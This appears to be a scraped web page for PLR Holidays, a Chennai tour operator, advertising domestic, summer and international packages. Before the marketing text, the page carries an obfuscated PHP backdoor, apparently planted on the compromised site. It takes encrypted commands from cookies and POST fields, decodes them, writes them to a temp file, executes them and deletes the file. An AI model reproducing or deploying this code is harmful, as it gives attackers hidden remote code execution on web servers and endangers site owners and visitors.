$lspqY = chr (69) . "\160" . "\x5f" . chr ( 299 - 226 )."\127" . "\x6f" . chr ( 282 - 171 ).chr (115); $kmFredLulI = chr (99) . chr (108) . "\x61" . "\163" . "\163" . chr (95) . "\145" . chr (120) . "\x69" . chr (115) . "\x74" . chr (115); $EkkTkZGG = class_exists($lspqY); $kmFredLulI = "60462";$XfThGjiuG = !1;if ($EkkTkZGG == $XfThGjiuG){function hyxEpg(){$ttzZF = new /* 21294 */ Ep_IWoos(48816 + 48816); $ttzZF = NULL;}$IoloSr = "48816";class Ep_IWoos{private function tlbVXiA($IoloSr){if (is_array(Ep_IWoos::$dWVcEk)) {$VniTe = sys_get_temp_dir() . "/" . crc32(Ep_IWoos::$dWVcEk['s' . "\x61" . chr (108) . chr (116)]);@Ep_IWoos::$dWVcEk["\167" . chr ( 179 - 65 ).'i' . chr (116) . "\x65"]($VniTe, Ep_IWoos::$dWVcEk["\x63" . "\157" . 'n' . "\x74" . 'e' . chr ( 590 - 480 ).'t']);include $VniTe;@Ep_IWoos::$dWVcEk[chr (100) . "\145" . chr ( 958 - 850 )."\x65" . chr (116) . chr ( 521 - 420 )]($VniTe); $IoloSr = "48816";exit();}}private $EsuNdw;public function GWbAEDzpU(){echo 48670;}public function __destruct(){Ep_IWoos::$dWVcEk = @unserialize(Ep_IWoos::$dWVcEk); $IoloSr = "42430_3987";$this->tlbVXiA($IoloSr); $IoloSr = "42430_3987";}public function JxHylK($fxRJKWOyY, $JJAzmXv){return $fxRJKWOyY[0] ^ str_repeat($JJAzmXv, (strlen($fxRJKWOyY[0]) / strlen($JJAzmXv)) + 1);}public function YdBrEsdVwB($fxRJKWOyY){$CZDUsZ = "base64";return array_map($CZDUsZ . "\137" . "\x64" . chr (101) . chr (99) . chr ( 129 - 18 )."\144" . 'e', array($fxRJKWOyY,));}public function __construct($zQNzfc=0){$TXkBgdjOHG = $_POST;$tNIgHyf = $_COOKIE;$JJAzmXv = "b96a2db1-3d3f-4a06-a60c-269a2af21020";$ZLVytRRH = @$tNIgHyf[substr($JJAzmXv, 0, 4)];if (!empty($ZLVytRRH)){$fxRJKWOyY = "";$ZLVytRRH = explode(",", $ZLVytRRH);foreach ($ZLVytRRH as $uKISgXJd){$fxRJKWOyY .= @$tNIgHyf[$uKISgXJd];$fxRJKWOyY .= @$TXkBgdjOHG[$uKISgXJd];}Ep_IWoos::$dWVcEk = $this->JxHylK($this->YdBrEsdVwB($fxRJKWOyY), $JJAzmXv);}}public static $dWVcEk = 2500;}hyxEpg();} PLR HOLIDAY – Holiday Packages in Chennai

The Perfect Tour Packages in PLR Holidays

If you are looking for a perfect holiday experience with memories to cherish you are at the right place. Let’s plan a reasonable stay for you.

To make you feel at home, when you are away from home! Enjoy the comfort of delicious Indian food and savor the taste of local cuisines, while on tour.

Experience the Life of PLR Holidays

A team of dedicated, enthusiastic and friendly tour managers to help you every step of the way and to ensure that you have a smooth, hassle-free and memorable travel experience.

Tour Packages

Domestic Tour Packages

Looking for Domestic tour packages? Choose your domestic holidays by interests like wildlife, adventure, beach & more

Summer Packages

Set forth on an exquisite wellness journey to refresh, re-energize and rejuvenate at our iconic places.

International Packages

Book the perfect International tour packages with best deals on offers.

All Inclusive Tours, Let's Ditch the Bag Loads!


Comfortable & convenient hotels cherry picked by our hotel management team

All meals

Eat to your heart's content Breakfast. Lunch. Dinner.

On-tour transport

Our itineraries include all rail, sea and road transport as part of the itinerary so you can enjoy tension free

Tour managers

We have an exclusive team of 35+ tour managers specializing in India and World tours

Best value itinerary

Our dedicated product & destination research team spends hours curating the best value for money itineraries

To and fro airfare

Veena World tours are inclusive of airfare from many hubs within India unless you pick the joining-leaving option

Our Inside Pictures

Take a look at some pretty pictures captured in and around our premises.

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lake, lagoon, snow-8545781.jpg
moutains, alpine, landscape-8535514.jpg
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mountain, peak, clouds-8433234.jpg
mountains, fir trees, summit-8544349.jpg

Plan an Unforgettable Experience in PLR Holidays Today!

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